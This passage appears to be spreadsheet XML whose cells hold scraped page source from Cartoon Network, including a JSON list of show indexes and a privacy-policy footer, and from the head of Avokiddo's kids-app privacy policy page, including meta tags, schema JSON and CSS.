Time","video_index_start_date":"2018-05-01T04:00:00","video_index_end_date":"2050-03-01T02:20:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2050-02-12T05:00:00","videoIndexCanonicalUrl":"/video/adventure-time/index.html","gameIndexCanonicalUrl":"/games/adventure-time/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/at_finn_180x180_0.png"},{"id":16,"title":"regular-show","display_title":"Regular Show","short_title":"Regular Show","video_index_start_date":"2018-05-03T04:00:00","video_index_end_date":"2050-05-03T15:00:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2050-02-12T05:00:00","videoIndexCanonicalUrl":"/video/regular-show/index.html","gameIndexCanonicalUrl":"/games/regular-show/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/reg_rigby_180x180.png"},{"id":18,"title":"peanuts","display_title":"Peanuts","short_title":"Peanuts","video_index_start_date":null,"video_index_end_date":null,"game_index_start_date":"2018-02-12T21:26:53","game_index_end_date":"2018-07-20T14:00:00","videoIndexCanonicalUrl":null,"gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/peanuts_homepage_branddrawer_charicon_2_180x180.png"},{"id":19,"title":"uncle-grandpa","display_title":"Uncle Grandpa","short_title":"Uncle</t>
  </si>
  <si>
    <t>Grandpa","video_index_start_date":"2018-05-16T14:00:00","video_index_end_date":"2050-05-16T03:00:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2020-12-07T17:00:00","videoIndexCanonicalUrl":"/video/uncle-grandpa/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/ug_unclegrandpa_180x180.png"},{"id":439,"title":"craig-of-the-creek","display_title":"Craig of the Creek","short_title":"Craig of the Creek","video_index_start_date":"2018-05-01T23:30:19","video_index_end_date":"2118-05-01T23:30:19","game_index_start_date":"2022-02-14T05:00:00","game_index_end_date":"2050-05-02T00:30:19","videoIndexCanonicalUrl":"/video/craig-of-the-creek/index.html","gameIndexCanonicalUrl":"/games/craig-of-the-creek/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/cotc_video_brand_drawer_180x180.png"},{"id":445,"title":"apple-and-onion","display_title":"Apple &amp; Onion","short_title":"Apple &amp; Onion","video_index_start_date":"2018-05-02T19:17:40","video_index_end_date":"2118-05-02T19:17:40","game_index_start_date":"2020-04-06T12:30:00","game_index_end_date":"2118-05-02T19:17:40","videoIndexCanonicalUrl":"/video/apple-and-onion/index.html","gameIndexCanonicalUrl":"/games/apple-and-onion/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/AO_brandpicker_180x180.png"},{"id":451,"title":"nexo-knights","display_title":"Nexo Knights","short_title":"Nexo Knights","video_index_start_date":"2018-05-03T19:54:36","video_index_end_date":"2118-05-03T19:54:36","game_index_start_date":"2019-05-03T19:54:36","game_index_end_date":"2118-05-03T19:54:36","videoIndexCanonicalUrl":"/video/nexo-knights/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/Lego_NexoNights_video-brand-drawer_180x180.png"},{"id":10714,"title":"over-the-garden-wall","display_title":"Over the Garden Wall","short_title":"Over the Garden Wall","video_index_start_date":"2018-05-16T15:57:57","video_index_end_date":"2118-05-16T15:57:57","game_index_start_date":"2019-05-16T15:57:57","game_index_end_date":"2118-05-16T15:57:57","videoIndexCanonicalUrl":"/video/over-the-garden-wall/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/otgw_greg_180x180.png"},{"id":35543,"title":"summer-camp-island","display_title":"Summer Camp Island","short_title":"Summer Camp Island","video_index_start_date":"2023-02-17T05:00:00","video_index_end_date":"2050-05-20T12:30:00","game_index_start_date":"2019-07-06T16:54:47","game_index_end_date":"2118-07-06T16:54:47","videoIndexCanonicalUrl":"/video/summer-camp-island/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/SCI_VideoBrandDrawer_180x180.png"},{"id":36275,"title":"total-dramarama","display_title":"Total Dramarama","short_title":"Total Dramarama","video_index_start_date":"2018-07-30T12:00:00","video_index_end_date":"2118-07-26T14:59:36","game_index_start_date":"2019-07-26T14:59:36","game_index_end_date":"2118-07-26T14:59:36","videoIndexCanonicalUrl":"/video/total-dramarama/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/TotalDramarama_BrandDrawer_180x180.png"},{"id":36283,"title":"mega-man","display_title":"Mega Man: Fully Charged","short_title":"Mega Man","video_index_start_date":"2018-07-26T14:00:00","video_index_end_date":"2118-07-26T19:53:18","game_index_start_date":"2019-07-26T19:53:18","game_index_end_date":"2118-07-26T19:53:18","videoIndexCanonicalUrl":"/video/mega-man/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/MegaMan_BrandDrawer_180x180.png"},{"id":41270,"title":"holiday","display_title":"Holiday Specials","short_title":"Holiday Specials","video_index_start_date":"2018-11-20T16:41:15","video_index_end_date":"2118-11-20T16:41:15","game_index_start_date":"2019-11-20T16:41:15","game_index_end_date":"2118-11-20T16:41:15","videoIndexCanonicalUrl":"/video/holiday/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/Holiday_2020_CharacterHead_180x180.png"},{"id":42222,"title":"bakugan","display_title":"Bakugan: Battle Planet","short_title":"Bakugan: Battle Planet","video_index_start_date":"2018-12-12T18:56:52","video_index_end_date":"2118-12-12T18:56:52","game_index_start_date":"2019-12-12T18:56:52","game_index_end_date":"2118-12-12T18:56:52","videoIndexCanonicalUrl":"/video/bakugan/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/bakugan_video-brand-drawer_180x180.png"},{"id":52252,"title":"ninjago","display_title":"Ninjago","short_title":"Ninjago","video_index_start_date":"2019-06-21T07:00:00","video_index_end_date":"2119-06-17T13:42:24","game_index_start_date":"2020-06-17T13:42:24","game_index_end_date":"2020-12-07T13:42:24","videoIndexCanonicalUrl":"/video/ninjago/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/Ninjago2019_video_brand_drawer_180x180.png"},{"id":61183,"title":"steven-universe-future","display_title":"Steven Universe Future","short_title":"Steven Universe Future","video_index_start_date":"2019-12-03T18:41:49","video_index_end_date":"2119-12-03T18:41:49","game_index_start_date":"2020-12-03T18:41:49","game_index_end_date":"2119-12-03T18:41:49","videoIndexCanonicalUrl":"/video/steven-universe-future/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/SUTF_VideoBrandDrawer_180x180.png"},{"id":61316,"title":"new-in-2020","display_title":"New in 2020","short_title":"New in 2020","video_index_start_date":"2019-12-05T20:43:53","video_index_end_date":"2119-12-05T20:43:53","game_index_start_date":"2020-12-05T20:43:53","game_index_end_date":"2119-12-05T20:43:53","videoIndexCanonicalUrl":"/video/new-in-2020/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/NEW-IN-2020_BRANDDRAWER_CHAR-ICON_180x180.png"},{"id":67167,"title":"old-school","display_title":"Old School","short_title":"Old School","video_index_start_date":"2020-03-24T13:55:49","video_index_end_date":"2120-03-24T13:55:49","game_index_start_date":"2021-03-24T13:55:49","game_index_end_date":"2120-03-24T13:55:49","videoIndexCanonicalUrl":"/video/old-school/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/CNClassics_VideoBrandDrawer_180x180.png"},{"id":68537,"title":"asian-american-pacific-islander-heritage-month","display_title":"Asian American and Pacific Islander Heritage Month","short_title":"Asian American and Pacific Islander Heritage Month","video_index_start_date":"2020-04-27T17:32:51","video_index_end_date":"2022-06-01T12:40:00","game_index_start_date":"2021-04-27T17:32:51","game_index_end_date":"2120-04-27T17:32:51","videoIndexCanonicalUrl":null,"gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/AAPIHM-video-brand-drawer.png"},{"id":70392,"title":"pride-month","display_title":"Pride Month","short_title":"Pride Month","video_index_start_date":"2022-06-03T04:00:00","video_index_end_date":"2120-06-01T13:24:42","game_index_start_date":"2021-06-01T13:24:42","game_index_end_date":"2120-06-01T13:24:42","videoIndexCanonicalUrl":"/video/pride-month/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/PrideMonth_2020_VideoBrandDrawer_180x180.png"},{"id":79184,"title":"best-of-2020","display_title":"Best of 2020","short_title":"Best of 2020","video_index_start_date":"2020-12-02T10:00:00","video_index_end_date":"2120-12-01T13:45:17","game_index_start_date":"2021-12-01T13:45:17","game_index_end_date":"2120-12-01T13:45:17","videoIndexCanonicalUrl":"/video/Best-Of-2020/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/best-of-2020_site-icon_180x180.png"},{"id":89125,"title":"the-looney-tunes-show","display_title":"The Looney Tunes Show","short_title":"The Looney Tunes Show","video_index_start_date":"2021-06-21T11:30:00","video_index_end_date":"2121-06-15T15:47:23","game_index_start_date":"2021-06-15T15:47:23","game_index_end_date":"2021-06-15T14:47:23","videoIndexCanonicalUrl":"/video/the-looney-tunes-show/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/JLhSfGxw.png"},{"id":90005,"title":"Looney-Tunes-Cartoons","display_title":"Looney Tunes Cartoons","short_title":"Looney Tunes Cartoons","video_index_start_date":"2021-07-05T16:30:00","video_index_end_date":"2121-07-02T12:59:12","game_index_start_date":"2022-07-02T12:59:12","game_index_end_date":"2121-07-02T12:59:12","videoIndexCanonicalUrl":"/video/Looney-Tunes-Cartoons/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/LTC%20180.png"},{"id":91864,"title":"Jellystone","display_title":"Jellystone","short_title":"Jellystone","video_index_start_date":"2021-08-09T13:23:32","video_index_end_date":"2121-08-09T13:23:32","game_index_start_date":"2022-08-09T13:23:32","game_index_end_date":"2121-08-09T13:23:32","videoIndexCanonicalUrl":"/video/Jellystone/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/Jellystone_VideoBrandDrawer_180x180.png"},{"id":93200,"title":"Care-Bears-Unlock-the-Magic","display_title":"Care Bears: Unlock the Magic","short_title":"Care Bears: Unlock the Magic","video_index_start_date":"2021-09-06T19:48:40","video_index_end_date":"2121-09-06T19:48:40","game_index_start_date":"2022-09-06T19:48:40","game_index_end_date":"2121-09-06T19:48:40","videoIndexCanonicalUrl":"/video/Care-Bears-Unlock-the-Magic/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/care-bears_video-brand-drawer_180x180.png"},{"id":93427,"title":"Thomas-And-Friends-All-Engines-Go","display_title":"Thomas and Friends: All Engines Go","short_title":"Thomas and Friends: All Engines Go","video_index_start_date":"2021-09-08T17:08:32","video_index_end_date":"2121-09-08T17:08:32","game_index_start_date":"2022-09-08T17:08:32","game_index_end_date":"2121-09-08T17:08:32","videoIndexCanonicalUrl":"/video/Thomas-And-Friends-All-Engines-Go/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/ThomasAndFriends_VideoBrandDrawer_180x180.png"},{"id":93702,"title":"Cartoonito","display_title":"Cartoonito","short_title":"Cartoonito","video_index_start_date":"2021-09-13T10:25:52","video_index_end_date":"2121-09-13T10:25:52","game_index_start_date":"2022-09-13T10:25:52","game_index_end_date":"2121-09-13T10:25:52","videoIndexCanonicalUrl":"/video/cartoonito/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/Cartoonito_VideoBrandDrawer_180x180.png"},{"id":97370,"title":"Harry-Potter-Hogwarts-Tournament-Of-Houses","display_title":"Harry Potter: Hogwarts Tournament of Houses","short_title":"Harry Potter: Hogwarts Tournament of Houses","video_index_start_date":"2021-11-29T04:45:00","video_index_end_date":"2121-11-25T16:22:50","game_index_start_date":"2022-11-25T16:22:50","game_index_end_date":"2121-11-25T16:22:50","videoIndexCanonicalUrl":"/video/Harry-Potter-Hogwarts-Tournament-Of-Houses/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/HP_180.png"},{"id":97927,"title":"We-Baby-Bears","display_title":"We Baby Bears","short_title":"We Baby Bears","video_index_start_date":"2021-12-02T15:56:25","video_index_end_date":"2121-12-02T15:56:25","game_index_start_date":"2022-12-02T15:56:25","game_index_end_date":"2121-12-02T15:56:25","videoIndexCanonicalUrl":"/video/We-Baby-Bears/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/WBB_180.png"},{"id":106280,"title":"Mecha-Builders","display_title":"Mecha Builders","short_title":"Mecha Builders","video_index_start_date":"2022-04-30T15:24:33","video_index_end_date":"2122-04-27T15:24:33","game_index_start_date":"2023-04-27T15:24:33","game_index_end_date":"2122-04-27T15:24:33","videoIndexCanonicalUrl":"/video/mecha-builders/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/mecha-builders_video-brand-drawer_180x180.png"},{"id":107898,"title":"Blippi-Wonders","display_title":"Blippi Wonders","short_title":"Blippi Wonders","video_index_start_date":"2022-06-06T04:00:00","video_index_end_date":"2122-06-03T12:56:58","game_index_start_date":"2023-06-03T12:56:58","game_index_end_date":"2122-06-03T12:56:58","videoIndexCanonicalUrl":"/video/blippi-wonders/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/blippi_videobranddrawer_180x180.png"},{"id":107901,"title":"Lellobee-City-Farm","display_title":"Lellobee City Farm","short_title":"Lellobee City Farm","video_index_start_date":"2022-06-06T04:00:00","video_index_end_date":"2122-06-03T16:31:33","game_index_start_date":"2023-06-03T16:31:33","game_index_end_date":"2122-06-03T16:31:33","videoIndexCanonicalUrl":"/video/lellobee-city-farm/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/Lellobee_CharacterHeadImage_180x180.png"},{"id":109584,"title":"Batwheels","display_title":"Batwheels","short_title":"Batwheels","video_index_start_date":"2022-07-11T17:33:38","video_index_end_date":"2122-07-11T17:33:38","game_index_start_date":"2022-06-01T18:40:05","game_index_end_date":"2122-07-13T17:33:38","videoIndexCanonicalUrl":"/video/Batwheels/index.html","gameIndexCanonicalUrl":"/games/batwheels/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/Batwheels_ShowPicker_180_Revised.png"},{"id":109898,"title":"Bugs-Bunny-Builders","display_title":"Bugs Bunny Builders","short_title":"Bugs Bunny Builders","video_index_start_date":"2022-07-12T16:36:13","video_index_end_date":"2122-07-12T16:36:13","game_index_start_date":"2023-07-12T16:36:13","game_index_end_date":"2122-07-12T16:36:13","videoIndexCanonicalUrl":"/video/bugs-bunny-builders/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/bugs-bunny-builders_video-brand-drawer_180x180.png"}]);
    &lt;/script&gt;
    &lt;div id="legalBody"&gt;
      &lt;div id="legalWrapper"&gt;
        &lt;div id="legalNav"&gt;
          &lt;p&gt;
            &lt;a href="https://policies.warnerbros.com/privacy/children/" target="_blank" id="privacy"&gt;PRIVACY POLICY&lt;/a&gt;
            &lt;span&gt;|&lt;/span&gt;
            &lt;a href="/legal/termsofuse.html"&gt;TERMS OF USE&lt;/a&gt;
            &lt;span&gt;|&lt;/span&gt;
            &lt;a href="/help"&gt;HELP&lt;/a&gt;
            &lt;span&gt;|&lt;/span&gt;
            &lt;a href="http://www.tvguidelines.org/"&gt;TV PARENTAL CONTROLS&lt;/a&gt;
            &lt;span id="secondLine"&gt;&lt;/span&gt;
            &lt;span&gt;|&lt;/span&gt;
            &lt;span id="secondLineSpacer"&gt;|&lt;/span&gt;
            &lt;a href="/legal/euala.html"&gt;EUALA&lt;/a&gt;
            &lt;span&gt;|&lt;/span&gt;
            &lt;a href="/contact"&gt;CONTACT US&lt;/a&gt;
            &lt;span&gt;|&lt;/span&gt;
            &lt;a
              href="http://news.turner.com/section_display.cfm?section_id=33"
              target="_new"
              &gt;PRESS ROOM&lt;/a
            &gt;
            &lt;span&gt;|&lt;/span&gt;
            &lt;a href="http://www.turner.com/careers/" target="_new"
              &gt;WORK WITH US&lt;/a
            &gt;
            &lt;span&gt;|&lt;/span&gt;
            &lt;a href="/legal/international.html"&gt;INTERNATIONAL SITES&lt;/a&gt;
          &lt;/p&gt;
        &lt;/div&gt;
        &lt;div id="legalHeader"&gt;
          &lt;h1&gt;PRIVACY POLICY&lt;/h1&gt;
        &lt;/div&gt;
        &lt;div id="legalText"&gt;
          &lt;p&gt;Updated:</t>
  </si>
  <si>
    <t>March 20, 2023&lt;br /&gt; To review the Privacy Policy, please go to the following on a desktop or mobile browser:&lt;br /&gt; &lt;a href="https://policies.warnerbros.com/privacy/children/"&gt;https://policies.warnerbros.com/privacy/children/&lt;/a&gt;&lt;/p&gt; 
        &lt;/div&gt;
        &lt;!--end of #legalWrapper --&gt;
      &lt;/div&gt;
      &lt;!-- end of #legalBody --&gt;
    &lt;/div&gt;
&lt;div id="global-footer"&gt;
	&lt;div class="global-footer-wrapper"&gt;
        &lt;div id="global-footer-nav"&gt;
            &lt;ul class="global-footer-nav-col-1"&gt;
            	&lt;li&gt;&lt;a href="https://policies.warnerbros.com/privacy/children/" target="_blank" id="global-footer-privacy-link"&gt;&lt;span class="global-footer-nav-text"&gt;Privacy Policy&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;            
                &lt; li&gt;&lt;a href="/legal/termsofuse.html"&gt;&lt;span class="global-footer-nav-text"&gt;Terms of Use&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
            	&lt;li&gt;&lt;a href="https://cartoonnetwork.zendesk.com/hc/en-us/sections/9494572158107-Closed-Captions-" target="_blank"&gt;&lt;s</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US" class="no-js"&gt;
&lt;head&gt;
	&lt;meta name="apple-itunes-app" content="app-id=1530907314, app-argument=myURL"&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" /&gt;&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
	&lt;!-- This site is optimized with the Yoast SEO plugin v20.5 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy &amp;bull; Avokiddo : Award-winning learning apps for kids&lt;/title&gt;&lt;link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin/&gt;&lt;link rel="preconnect" href="https://fonts.googleapis.com"/&gt;&lt;style type="text/css"&gt;@font-face {
  font-family: 'Open Sans';
  font-style: normal;
  font-weight: 300;
  font-stretch: normal;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVc.ttf) format('truetype');
}
@font-face {
  font-family: 'Open Sans';
  font-style: normal;
  font-weight: 400;
  font-stretch: normal;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');
}
@font-face {
  font-family: 'Open Sans';
  font-style: normal;
  font-weight: 600;
  font-stretch: normal;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4uaVc.ttf) format('truetype');
}
@font-face {
  font-family: 'Open Sans';
  font-style: normal;
  font-weight: 700;
  font-stretch: normal;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1x4uaVc.ttf) format('truetype');
}
@font-face {
  font-family: 'Quicksand';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv58i-xw.ttf) format('truetype');
}
&lt;/style&gt;&lt;link rel="stylesheet" id="siteground-optimizer-combined-css-ce015a54d4cfc2195c32c5dc38037970" href="https://www.avokiddo.com/wp-content/uploads/siteground-optimizer-assets/siteground-optimizer-combined-css-ce015a54d4cfc2195c32c5dc38037970.css" media="all" /&gt;
	&lt;meta name="description" content="Learning kids apps for ages 3-10. Play STEM games and sharpen your logic and memory while having fun!"</t>
  </si>
  <si>
    <t>/&gt;
	&lt;link rel="canonical" href="https://www.avokiddo.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy &amp;bull; Avokiddo : Award-winning learning apps for kids" /&gt;
	&lt;meta property="og:description" content="Learning kids apps for ages 3-10. Play STEM games and sharpen your logic and memory while having fun!" /&gt;
	&lt;meta property="og:url" content="https://www.avokiddo.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Avokiddo : Award-winning learning apps for kids" /&gt;
	&lt;meta property="article:publisher" content="https://www.facebook.com/avokiddo/" /&gt;
	&lt;meta property="article:modified_time" content="2022-08-29T17:44:53+00:00" /&gt;
	&lt;meta property="og:image" content="https://www.avokiddo.com/wp-content/uploads/2021/07/Thinkrolls-free-trial-banner.jpg" /&gt;
	&lt;meta property="og:image:width" content="1920" /&gt;
	&lt;meta property="og:image:height" content="1080" /&gt;
	&lt;meta property="og:image:type" content="image/jpeg" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:site" content="@avokiddogames" /&gt;
	&lt;meta name="twitter:label1" content="Est.</t>
  </si>
  <si>
    <t>reading time" /&gt;
	&lt;meta name="twitter:data1" content="17 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://www.avokiddo.com/privacy-policy/","url":"https://www.avokiddo.com/privacy-policy/","name":"Privacy Policy &amp;bull; Avokiddo : Award-winning learning apps for kids","isPartOf":{"@id":"https://www.avokiddo.com/#website"},"datePublished":"2020-07-17T11:07:36+00:00","dateModified":"2022-08-29T17:44:53+00:00","description":"Learning kids apps for ages 3-10. Play STEM games and sharpen your logic and memory while having fun!","breadcrumb":{"@id":"https://www.avokiddo.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.avokiddo.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://www.avokiddo.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.avokiddo.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://www.avokiddo.com/#website","url":"https://www.avokiddo.com/","name":"Avokiddo : Award-winning learning apps for kids","description":"Kids learn how to code and solve problems while having fun","publisher":{"@id":"https://www.avokiddo.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.avokiddo.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://www.avokiddo.com/#organization","name":"Avokiddo","url":"https://www.avokiddo.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.avokiddo.com/#/schema/logo/image/","url":"https://www.avokiddo.com/wp-content/uploads/2021/04/logo_Avokiddo.jpg","contentUrl":"https://www.avokiddo.com/wp-content/uploads/2021/04/logo_Avokiddo.jpg","width":2464,"height":1237,"caption":"Avokiddo"},"image":{"@id":"https://www.avokiddo.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/avokiddo/","https://twitter.com/avokiddogames","https://www.instagram.com/avokiddo_games/","https://www.linkedin.com/company/avokiddo","https://www.youtube.com/channel/UChiKGE1qw-N5D4sI2x289fA"]}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml"</t>
  </si>
  <si>
    <t>title="Avokiddo : Award-winning learning apps for kids &amp;raquo; Feed" href="https://www.avokiddo.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Avokiddo : Award-winning learning apps for kids &amp;raquo; Comments Feed" href="https://www.avokiddo.com/comments/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Avokiddo : Award-winning learning apps for kids &amp;raquo; Privacy Policy Comments Feed" href="https://www.avokiddo.com/privacy-policy/feed/" /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.avokiddo.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2"}};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t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;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 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined:</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;style id='salient-social-inline-css' type='text/css'&gt;
_x005F_x000D_
  .sharing-default-minimal .nectar-love.loved,_x005F_x000D_
  body .nectar-social[data-color-override="override"].fixed &gt; a:before, _x005F_x000D_
  body .nectar-social[data-color-override="override"].fixed .nectar-social-inner a,_x005F_x000D_
  .sharing-default-minimal .nectar-social[data-color-override="override"] .nectar-social-inner a:hover {_x005F_x000D_
    background-color: #000000;_x005F_x000D_
  }_x005F_x000D_
  .nectar-social.hover .nectar-love.loved,_x005F_x000D_
  .nectar-social.hover &gt; .nectar-love-button a:hover,_x005F_x000D_
  .nectar-social[data-color-override="override"].hover &gt; div a:hover,_x005F_x000D_
  #single-below-header .nectar-social[data-color-override="override"].hover &gt; div a:hover,_x005F_x000D_
  .nectar-social[data-color-override="override"].hover .share-btn:hover,_x005F_x000D_
  .sharing-default-minimal .nectar-social[data-color-override="override"] .nectar-social-inner a {_x005F_x000D_
    border-color: #000000;_x005F_x000D_
  }_x005F_x000D_
  #single-below-header .nectar-social.hover .nectar-love.loved i,_x005F_x000D_
  #single-below-header .nectar-social.hover[data-color-override="override"] a:hover,_x005F_x000D_
  #single-below-header .nectar-social.hover[data-color-override="override"] a:hover i,_x005F_x000D_
  #single-below-header .nectar-social.hover .nectar-love-button a:hover i,_x005F_x000D_
  .nectar-love:hover i,_x005F_x000D_
  .hover</t>
  </si>
  <si>
    <t>.nectar-love:hover .total_loves,_x005F_x000D_
  .nectar-love.loved i,_x005F_x000D_
  .nectar-social.hover .nectar-love.loved .total_loves,_x005F_x000D_
  .nectar-social.hover .share-btn:hover, _x005F_x000D_
  .nectar-social[data-color-override="override"].hover .nectar-social-inner a:hover,_x005F_x000D_
  .nectar-social[data-color-override="override"].hover &gt; div:hover span,_x005F_x000D_
  .sharing-default-minimal .nectar-social[data-color-override="override"] .nectar-social-inner a:not(:hover) i,_x005F_x000D_
  .sharing-default-minimal .nectar-social[data-color-override="override"] .nectar-social-inner a:not(:hover) {_x005F_x000D_
    color: #000000;_x005F_x000D_
  }
&lt;/style&gt;
&lt;style id='main-styles-inline-css' type='text/css'&gt;
html body[data-header-resize="1"] .container-wrap, html body[data-header-resize="0"] .container-wrap, body[data-header-format="left-header"][data-header-resize="0"] .container-wrap { padding-top: 0; }
html:not(.page-trans-loaded) { background-color: #ffffff; }
&lt;/style&gt;
&lt;style id='dynamic-css-inline-css' type='text/css'&gt;
@media only screen and (min-width:1000px){body #ajax-content-wrap.no-scroll{min-height:calc(100vh - 166px);height:calc(100vh - 166px)!important;}}@media only screen and (min-width:1000px){#page-header-wrap.fullscreen-header,#page-header-wrap.fullscreen-header #page-header-bg,html:not(.nectar-box-roll-loaded) .nectar-box-roll &gt; #page-header-bg.fullscreen-header,.nectar_fullscreen_zoom_recent_projects,#nectar_fullscreen_rows:not(.afterLoaded) &gt; div{height:calc(100vh - 165px);}.wpb_row.vc_row-o-full-height.top-level,.wpb_row.vc_row-o-full-height.top-level &gt; .col.span_12{min-height:calc(100vh - 165px);}html:not(.nectar-box-roll-loaded) .nectar-box-roll &gt; #page-header-bg.fullscreen-header{top:166px;}.nectar-slider-wrap[data-fullscreen="true"]:not(.loaded),.nectar-slider-wrap[data-fullscreen="true"]:not(.loaded) .swiper-container{height:calc(100vh - 164px)!important;}.admin-bar .nectar-slider-wrap[data-fullscreen="true"]:not(.loaded),.admin-bar 